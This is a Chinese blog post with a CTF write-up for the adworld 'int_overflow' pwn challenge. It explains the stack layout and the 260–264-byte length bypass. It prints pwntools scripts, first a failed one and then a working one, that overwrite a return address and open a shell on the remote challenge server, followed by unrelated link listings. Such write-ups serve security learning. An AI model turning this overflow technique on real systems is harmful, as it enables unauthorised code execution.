adworld-pwn-int_overflow

最新推荐文章于 2022-04-19 17:22:46 发布
最新推荐文章于 2022-04-19 17:22:46 发布
阅读量92 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bunner_/article/details/109125104
版权

查保护机制NX,查架构32位
扔到IDA中,发现是让你登录,输入用户名,输入密码,再绕过检测即可
在这里插入图片描述
所以这里就是控制密码位数,然后在相应位置插入我们的目标地址,使得check_password函数的返回地址为目标地址
目标地址怎么找?
传统艺能[shift+F12]
在这里插入图片描述
找到了what_is_this函数,其首地址为0x0804868B
绕过长度限制需要我们的payload的长度为[260, 264]
目标地址填充在哪?
dest的首地址为[ebp - 14h]
栈的结构是这样的:

位置内容
[ebp+4]返回地址
[ebp]旧的ebp的内容
[ebp-14h]dest首地址

所以在dest到返回地址中间有24字节的内容
构造密码:

payload = `a` * 24 + p32(0x0804868B) + 'a' * 232

虚假的exploit

from pwn import *

p = remote('220.249.52.133', '33759')
call_system = 0x0804868B
payload = bytes('a' * 24, encoding='utf8') + p32(call_system) + bytes('a' * 232, encoding='utf8')
p.sendline('1')
p.sendline('admin')
p.sendline(payload)
p.interactive()

运行,直接被拦截 Invalid password
在这里插入图片描述
为什么不对呢?
发现输出了这个玩意

hello admin
aaaaaaaaaaaaaaaaaaa

原来是把password的前面一部分当成username了,那我就把username的内容填充完整就好了
真实的exploit

from pwn import *

p = remote('220.249.52.133', '33759')
call_system = 0x0804868B
payload = bytes('a' * 24, encoding='utf8') + p32(call_system) + bytes('a' * 232, encoding='utf8')
p.sendline('1')
p.sendline('adminaaaaaaaaaaaaaaaaaaa')
p.sendline(payload)
p.interactive()

在这里插入图片描述
完结,撒花!

bunner_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
adworld-pwn-level2
bunner_的博客
10-17 173
必要知识点: 32位系统函数调用使用堆栈传参 其调用时栈的结构如下: 返回地址 -> 参数n -> 参数n-1 -> … -> 参数1 将elf文件扔到IDA中 跟进到vulnerable函数,里面有输入函数,可以用来做栈溢出 再看到有system函数 又在shift+f12字符串窗口里面看到/bin/sh 所以就是构造ROP链,通过栈溢出调用system函数,并将/bin/sh压入栈中作为参数 找到system的地址: 0x08048320 找到/bin/sh地址:0x080
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
在本文中,我们将深入探讨一个名为"adworld-wargame"的在线Pwn挑战,该挑战源自https://adworld.xctf.org.cn/task平台。这个挑战主要涉及Python编程语言,这意味着我们需要熟悉Python的内存管理和安全特性来成功解决...
JavaScript运行环境和作用域链
weixin_30399155的博客
05-03 52
运行环境:就是JavaScript代码段执行所在的环境(可以理解成C/C++中的作用域)【个人理解】 变量对象:首先是一个对象,对象中保存着当前执行环境的所有变量和函数(JavaScript中函数可以嵌套,C/C++的好像不能(新的版本好像可以了)) 对应关系:每一个执行环境都有一个关联的变量对象 作用域链:链,链表。      作用:保证对执行环境有权访问的所有变量和函数的有序访问(什么...
day-9 xctf-int_overflow
a525024162806525的博客
09-29 342
xctf-int_overflow 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=undefined checksec文件,No canary found,32位程序: 用ida打开查看: 判断输入,选择功能菜单:1...
adworld-pwn-guess_num
bunner_的博客
10-21 202
本题考查知识点 srand()函数和rand()函数的随机数生成规则 gets()函数漏洞 – 实现栈溢出 check_sec 扔到IDA分析代码逻辑 srand()函数和rand()函数 前者设置随机种子,后者产生随机数 设置随机种子之后,随机数是循环产生的 从上图中可以看到v8和seed之间的位置关系,而v8是通过gets()函数输入的,我们可以通过栈溢出,从而达到设置seed的目的 v8 占用0x20个字节 seed 占用8个字节 所以我们构造下面的payload即可设置se.
PWN做题笔记2-int_overflow(已校对)
qq_40923256的博客
04-19 237
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=1 如图,程序是一个32位ELF文件 chesec ida反编译,main方法中实现了登录功能,无溢出点 login方法中输入用户名和密码: 这里位数上0x19<40,0x199<512,因此无溢出 check_passwd实现对密码长度进行检查: 密...
ADworldPwn--get_shell
VZZmieshenquan的博客
02-14 2456
Description: 运行就能拿到shell呢,真的 文件:https://adworld.xctf.org.cn/media/task/attachments/get_shell/get_shell Solution: 点击获取在线场景后会给nc链接,之后cat flag即可 Flag: xctf{0f156d10bc369c0208b76f5794b9b86d} ...
ADworld pwn wp - hacknote
fa1c4的blog
08-30 188
前言 攻防世界的一道pwn, UAF漏洞 https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4717&page=2 分析过程 void __cdecl __noreturn main() { int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch
ADworld pwn wp - secret_file
fa1c4的blog
06-28 108
正文 缺少libc动态链接文件, 搜索一下是openssl的一个开源库, 实现加密算法, 找不到方便的解决方法, 直接连服务器打题 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8; // e
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现北方苍鹰优化算法NGO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【SCI一区】Matlab实现金豺优化算法GJO-CNN-LSTM-Attention的风电功率预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值